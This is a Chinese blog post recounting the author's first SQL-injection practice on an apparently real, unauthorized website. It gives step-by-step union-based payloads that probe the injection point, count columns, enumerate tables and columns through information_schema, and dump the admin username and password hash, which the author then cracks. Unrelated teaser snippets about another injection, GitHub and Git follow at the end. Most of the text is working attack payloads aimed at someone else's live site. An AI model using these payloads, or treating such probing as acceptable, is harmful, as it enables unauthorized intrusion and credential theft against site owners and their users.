記一次操蛋的mysql注入之旅

2021-07-27 02:38:23 字數 1486 閱讀 7530

最近開始學習web安全的知識,剛好學完mysql注入這塊,趕緊找個**練練手,整個過程很順利,但是結果很操蛋。我還是個小菜鳥,各位大神看了輕噴......

站點:馬賽克遮體)

1.注入點檢測

and 1=1 結果正常

and 1=2 結果為空

勤奮的孩子運氣不會差,一出手就發現了注入點,下面就開始一步步開搞。

2.猜查詢字段

order by 10 頁面顯示錯誤,說明查詢的字段數小於10,縮小範圍再試

order by 5   頁面顯示錯誤,繼續縮小

order by 4   頁面顯示正常,說明查詢的字段數就是4,接下來就可以進一步收集資訊了

3.資訊收集

and 1=2 union select 1,database(),user(),version()   從結果中得到三個資訊,第一資料庫名稱zadmin_aaa(化名),第二使用者名稱,第三版本號5.5.49,看到版本號第一反應就是可以利用information_schema來搞事情了。

4.爆表名

and 1=2 union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=0x7a61646d696e5f616161

這裡有點要注意,就是庫名要轉成16進製制來查詢,zadmin_aaa轉完為0x7a61646d696e5f616161。

從執行結果可以看到有下面幾個表:***_user,***_category,***_content,很明顯***_user就是我們要爆的表

5.爆欄位名

and 1=2 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x7878785f55736572

同樣的表名也要轉成16進製制來查詢。

執行結果爆出三個字段,id,password,username(真是個簡單的表),有了字段有了表名,當然就可以獲取登入名和密碼了

6.爆username和password值

and 1=2 union select 1,2,3,group_concat(id,0x27,password,0x27,username) from ***_user

執行結果:1|admin|55f069b9e8bd8b58c40a25feb5e505ca

接下來就是破解md5,沒什麼好介紹,網上一堆工具可用

賬號密碼都在收了,接下來當然後登入後台,然後開啟後台的那一刻我懵逼了,後台頁面上只有乙個錯誤提示,根本就沒有登入框。。。。我彷彿看到了站長猥瑣的笑容。這次本意是練習注入,並不想搞太多事情,所以也就就此打住,文章水平不高,看到的大佬們,請輕噴。。。。

記一次搜尋型注入

1.起因 還是和往常一樣,看見index.php?id 1這樣的介面順手就想來個and 1 1 結果沒反應,試試其他的大小寫 內聯注釋 多次編碼注入均失敗,我望著頁面的無效引數陷入了深思,難道這個 真的沒有一絲可以利用的地方,我告訴自己不可能,肯定是自己能力不夠還不足以發現頁面的漏洞,既然sql不行...

記一次github踩坑之旅

關於vue專案預覽問題 由於vur cli 的公升級,生成的專案目錄中沒有config檔案。根據官網介紹可以自己在根目錄下新建vue.config.js。在將vue專案上傳到github時,必須必須先編譯 本人第一次上傳就那麼得瑟的將未編譯檔案push啦 執行npn run build,會得到乙份打...

記一次 Git 操作的糟心之旅

開發一天,最後下班的時候,要合併到master上,結果呢,出現報錯 please move or remove them before you can merge.abortinggit clean d fx 其中 x 刪除忽略檔案已經對git來說不識別的檔案 d 刪除未被新增到git的路徑中的檔案...